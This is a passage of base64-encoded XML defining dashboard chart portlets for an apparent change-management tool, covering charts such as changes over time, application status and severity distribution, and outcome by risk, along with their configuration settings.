24+PEJ1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48ZGF0YVNvdXJjZT48aWQ+Q0hBTkdFX09WRVJfVElNRV9EQVRBX1NPVVJDRTwvaWQ+PG5hbWU+Q2hhbmdlcyBPdmVyIFRpbWU8L25hbWU+PC9kYXRhU291cmNlPjxwcmVmZXJlbmNlU3VtbWFyeVNob3duPnRydWU8L3ByZWZlcmVuY2VTdW1tYXJ5U2hvd24+PHJlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PmZhbHNlPC9yZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz48aGVscFRleHQvPjxwcmVmZXJlbmNlPjxuYW1lPkZpbHRlcjwvbmFtZT48dHlwZT5kcm9wZG93bjwvdHlwZT48cHJvbXB0PkZpbHRlcjo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZS8+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjxwcmVmZXJlbmNlPjxuYW1lPkdyb3VwIEJ5PC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+R3JvdXAgQnk6PC9wcm9tcHQ+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4xPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjE8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWU+W3dlZWtdW1dlZWtdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjwvQnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxjaGFydFRpdGxlPkNoYW5nZXMgT3ZlciBUaW1lPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZS8+PHRvb2x0aXBTb3VyY2U+Q291bnQ8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+Q291bnQ8L3lBeGlzU291cmNlPjx5QXhpc0xhYmVsPkNvdW50PC95QXhpc0xhYmVsPjxzZXJpZXNTb3VyY2U+TGluZSBMYWJlbDwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5DaGFuZ2VzPC9zZXJpZXNMYWJlbD48L0xpbmVDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkxpbmVDaGFydDwvdHlwZT48bmFtZT5DaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48dXVpZD4zMjljODEyYzUxNzgzZTllOjZhOTUyMGYzOjExNjM5ODE3ZGEyOi03ZmVjPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPmZhbHNlPC9leHBvcnRBc1dTUlA+PHN1cHBvcnREcmlsbFRvPnRydWU8L3N1cHBvcnREcmlsbFRvPjxwb3J0bGV0Q29tbVN1cD5mYWxzZTwvcG9ydGxldENvbW1TdXA+PGJ1aWx0SW4+ZmFsc2U8L2J1aWx0SW4+PGRlcGVuZGVudFV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmM8L2RlcGVuZGVudFV1aWQ+PC9Qb3J0bGV0RGVmaW5pdGlvbj48UG9ydGxldERlZmluaXRpb24+PE11bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BUFBMSUNBVElPTl9TVEFUVVNfRElTVFJJQlVUSU9OPC9pZD48bmFtZT5CdXNpbmVzcyBDSSBTdGF0dXMgRGlzdHJpYnV0aW9uPC9uYW1lPjwvZGF0YVNvdXJjZT48cHJlZmVyZW5jZVN1bW1hcnlTaG93bj50cnVlPC9wcmVmZXJlbmNlU3VtbWFyeVNob3duPjxyZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz5mYWxzZTwvcmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+PGhlbHBUZXh0Lz48cHJlZmVyZW5jZT48bmFtZT5Vc2VyIEFwcGxpY2F0aW9uczwvbmFtZT48dHlwZT55ZXNObzwvdHlwZT48cHJvbXB0PlNob3cgT25seSBVc2VyIEFwcGxpY2F0aW9uczwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MTwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltZXVtZZXNdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+ZWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5UaW1lIEZyYW1lPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+Q3JlYXRlZCBXaXRoaW48L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bTGFzdCBNb250aF1bTGFzdCBNb250aF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QXBwbGljYXRpb24gU3RhdHVzIERpc3RyaWJ1dGlvbjwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2UvPjx0b29sdGlwU291cmNlPiMgUmVxdWVzdHM8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uPnZlcnRpY2FsPC9vcmllbnRhdGlvbj48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48YmFyTmFtZVNvdXJjZT5JbXBhY3RlZCBBcHBsaWNhdGlvbjwvYmFyTmFtZVNvdXJjZT48YmFyQXhpc0xhYmVsPkltcGFjdGVkIEFwcGxpY2F0aW9uPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48c2VyaWVzU291cmNlPlN0YXR1czwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5TdGF0dXM8L3Nlcmllc0xhYmVsPjwvTXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkNsdXN0ZXJlZEJhckNoYXJ0PC90eXBlPjxuYW1lPkFwcGxpY2F0aW9uIFN0YXR1cyBEaXN0cmlidXRpb248L25hbWU+PHV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmY8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjI8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+dHJ1ZTwvZXhwb3J0QXNXU1JQPjxzdXBwb3J0RHJpbGxUbz50cnVlPC9zdXBwb3J0RHJpbGxUbz48cG9ydGxldENvbW1TdXA+ZmFsc2U8L3BvcnRsZXRDb21tU3VwPjxidWlsdEluPmZhbHNlPC9idWlsdEluPjxkZXBlbmRlbnRVdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC9kZXBlbmRlbnRVdWlkPjwvUG9ydGxldERlZmluaXRpb24+PFBvcnRsZXREZWZpbml0aW9uPjxMaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5DSEFOR0VfT1ZFUl9USU1FX0RBVEFfU09VUkNFPC9pZD48bmFtZT5DaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5Hcm91cCBCeTo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjE8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bd2Vla11bV2Vla108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlsyOTQ5MThdW0xhdGVudF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+TGF0ZW50IENoYW5nZXMgT3ZlciBUaW1lPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZS8+PHRvb2x0aXBTb3VyY2U+Q291bnQ8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+Q291bnQ8L3lBeGlzU291cmNlPjx5QXhpc0xhYmVsPkNvdW50PC95QXhpc0xhYmVsPjxzZXJpZXNTb3VyY2U+TGluZSBMYWJlbDwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5MYXRlbnQgQ2hhbmdlczwvc2VyaWVzTGFiZWw+PC9MaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5MaW5lQ2hhcnQ8L3R5cGU+PG5hbWU+TGF0ZW50IENoYW5nZXMgT3ZlciBUaW1lPC9uYW1lPjx1dWlkPjNiN2JiNmFhMDI5NzdmNWM6Njk0MDIxMGI6MTE2M2JjYjM5NGE6LTdmZGY8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjxDaGFydFBvcnRsZXREZWZpbml0aW9uPjxCdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGRhdGFTb3VyY2U+PGlkPk9VVENPTUVfR1JPVVBCWV9OVU1FUklDX0ZJRUxEX0RBVEFfU09VUkNFPC9pZD48bmFtZT5PdXRjb21lIEdyb3VwIGJ5IE51bWVyaWMgRmllbGQ8L25hbWU+PC9kYXRhU291cmNlPjxwcmVmZXJlbmNlU3VtbWFyeVNob3duPnRydWU8L3ByZWZlcmVuY2VTdW1tYXJ5U2hvd24+PHJlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PmZhbHNlPC9yZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz48aGVscFRleHQvPjxwcmVmZXJlbmNlPjxuYW1lPk1heGltdW0gVmFsdWU8L25hbWU+PHR5cGU+dGV4dDwvdHlwZT48cHJvbXB0Pk1heGltdW0gVmFsdWU6PC9wcm9tcHQ+PGxheW91dFJvdz4zPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWU+WzEwMF1bXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5NaW5pbXVuIFZhbHVlPC9uYW1lPjx0eXBlPnRleHQ8L3R5cGU+PHByb21wdD5NaW5pbXVuIFZhbHVlOjwvcHJvbXB0PjxsYXlvdXRSb3c+MjwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlswXVtdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjxwcmVmZXJlbmNlPjxuYW1lPkludGVydmFsPC9uYW1lPjx0eXBlPnRleHQ8L3R5cGU+PHByb21wdD5JbnRlcnZhbDo8L3Byb21wdD48bGF5b3V0Um93PjQ8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bMTBdW108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlLz48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+TnVtZXJpYyBUeXBlPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+TnVtZXJpYyBUeXBlOjwvcHJvbXB0PjxsYXlvdXRSb3c+MTwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltjYWxjdWxhdGVkLXJpc2tdW2NhbGN1bGF0ZWQtcmlza108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+T3V0Y29tZSBHcm91cCBCeSBSaXNrPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZT5Db2xvcjwvY29sb3JTb3VyY2U+PHRvb2x0aXBTb3VyY2U+VG9vbHRpcDwvdG9vbHRpcFNvdXJjZT48dG9vbHRpcENvbnRhaW5zSFRNTD5mYWxzZTwvdG9vbHRpcENvbnRhaW5zSFRNTD48b3JpZW50YXRpb24+dmVydGljYWw8L29yaWVudGF0aW9uPjxoeXBlcmxpbms+PGh5cGVybGlua1R5cGU+bm9IeXBlcmxpbms8L2h5cGVybGlua1R5cGU+PGh5cGVybGlua1NvdXJjZS8+PC9oeXBlcmxpbms+PC9DaGFydFBvcnRsZXREZWZpbml0aW9uPjxiYXJOYW1lU291cmNlPkZpZWxkPC9iYXJOYW1lU291cmNlPjxiYXJBeGlzTGFiZWw+UmlzazwvYmFyQXhpc0xhYmVsPjx2YWx1ZVNvdXJjZT5QZXJjZW50YWdlPC92YWx1ZVNvdXJjZT48dmFsdWVBeGlzTGFiZWw+UGVyY2VudGFnZTwvdmFsdWVBeGlzTGFiZWw+PHNlcmllc1NvdXJjZT5PdXRjb21lPC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPk91dGNvbWU8L3Nlcmllc0xhYmVsPjwvTXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkNsdXN0ZXJlZEJhckNoYXJ0PC90eXBlPjxuYW1lPk91dGNvbWUgR3JvdXBlZCBCeSBSaXNrPC9uYW1lPjx1dWlkPjZhMzY3M2M5ZmViNzZkY2I6LTUxOTcwOGNjOjExNzJiYTU3OWVkOi03ZmYxPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPmZhbHNlPC9leHBvcnRBc1dTUlA+PHN1cHBvcnREcmlsbFRvPnRydWU8L3N1cHBvcnREcmlsbFRvPjxwb3J0bGV0Q29tbVN1cD5mYWxzZTwvcG9ydGxldENvbW1TdXA+PGJ1aWx0SW4+ZmFsc2U8L2J1aWx0SW4+PGRlcGVuZGVudFV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmM8L2RlcGVuZGVudFV1aWQ+PC9Qb3J0bGV0RGVmaW5pdGlvbj48UG9ydGxldERlZmluaXRpb24+PE11bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BUFBMSUNBVElPTl9TRVZFUklUWV9ESVNUUklCVVRJT048L2lkPjxuYW1lPkJ1c2luZXNzIENJIFNldmVyaXR5IERpc3RyaWJ1dGlvbjwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+VXNlciBBcHBsaWNhdGlvbnM8L25hbWU+PHR5cGU+eWVzTm88L3R5cGU+PHByb21wdD5TaG93IE9ubHkgVXNlciBBcHBsaWNhdGlvbnM8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bWV1bWWVzXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPmVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5SZXF1ZXN0IFN0YXR1czwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MTwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QXBwbGljYXRpb24gU2V2ZXJpdHkgRGlzdHJpYnV0aW9uPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZT5TZXZlcml0eSBDb2xvcnM8L2NvbG9yU291cmNlPjx0b29sdGlwU291cmNlPiMgUmVxdWVzdHM8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uPnZlcnRpY2FsPC9vcmllbnRhdGlvbj48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48YmFyTmFtZVNvdXJjZT5JbXBhY3RlZCBBcHBsaWNhdGlvbjwvYmFyTmFtZVNvdXJjZT48YmFyQXhpc0xhYmVsPkltcGFjdGVkIEFwcGxpY2F0aW9uPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48c2VyaWVzU291cmNlPlNldmVyaXR5PC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPlNldmVyaXR5PC9zZXJpZXNMYWJlbD48L011bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5DbHVzdGVyZWRCYXJDaGFydDwvdHlwZT48bmFtZT5BcHBsaWNhdGlvbiBTZXZlcml0eSBEaXN0cmlidXRpb248L25hbWU+PHV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTgwMDA8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjI8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+dHJ1ZTwvZXhwb3J0QXNXU1JQPjxzdXBwb3J0RHJpbGxUbz50cnVlPC9zdXBwb3J0RHJpbGxUbz48cG9ydGxldENvbW1TdXA+ZmFsc2U8L3BvcnRsZXRDb21tU3VwPjxidWlsdEluPmZhbHNlPC9idWlsdEluPjxkZXBlbmRlbnRVdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC9kZXBlbmRlbnRVdWlkPjwvUG9ydGxldERlZmluaXRpb24+PFBvcnRsZXREZWZpbml0aW9uPjxMaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BQk5PUk1BTF9DSEFOR0VfT1ZFUl9USU1FX0RBVEFfU09VUkNFPC9pZD48bmFtZT5BYm5vcm1hbCBDaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5Hcm91cCBCeTo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjE8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bd2Vla11bV2Vla108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlLz48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QWJub3JtYWwgQ2hhbmdlcyBPdmVyIFRpbWU8L2NoYXJ0VGl0bGU+PGNvbG9yU291cmNlLz48dG9vbHRpcFNvdXJjZT5Db3VudDwvdG9vbHRpcFNvdXJjZT48dG9vbHRpcENvbnRhaW5zSFRNTD5mYWxzZTwvdG9vbHRpcENvbnRhaW5zSFRNTD48b3JpZW50YXRpb24vPjxoeXBlcmxpbms+PGh5cGVybGlua1R5cGU+bm9IeXBlcmxpbms8L2h5cGVybGlua1R5cGU+PGh5cGVybGlua1NvdXJjZS8+PC9oeXBlcmxpbms+PC9DaGFydFBvcnRsZXREZWZpbml0aW9uPjx4QXhpc1NvdXJjZT5QbGFubmluZyBTdGFydCBUaW1lPC94QXhpc1NvdXJjZT48eEF4aXNMYWJlbD5QbGFubmluZyBTdGFydCBUaW1lPC94QXhpc0xhYmVsPjx5QXhpc1NvdXJjZT5Db3VudDwveUF4aXNTb3VyY2U+PHlBeGlzTGFiZWw+Q291bnQ8L3lBeGlzTGFiZWw+PHNlcmllc1NvdXJjZT5MaW5lIExhYmVsPC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPkFibm9ybWFsIENoYW5nZXM8L3Nlcmllc0xhYmVsPjwvTGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PHR5cGU+TGluZUNoYXJ0PC90eXBlPjxuYW1lPkFibm9ybWFsIENoYW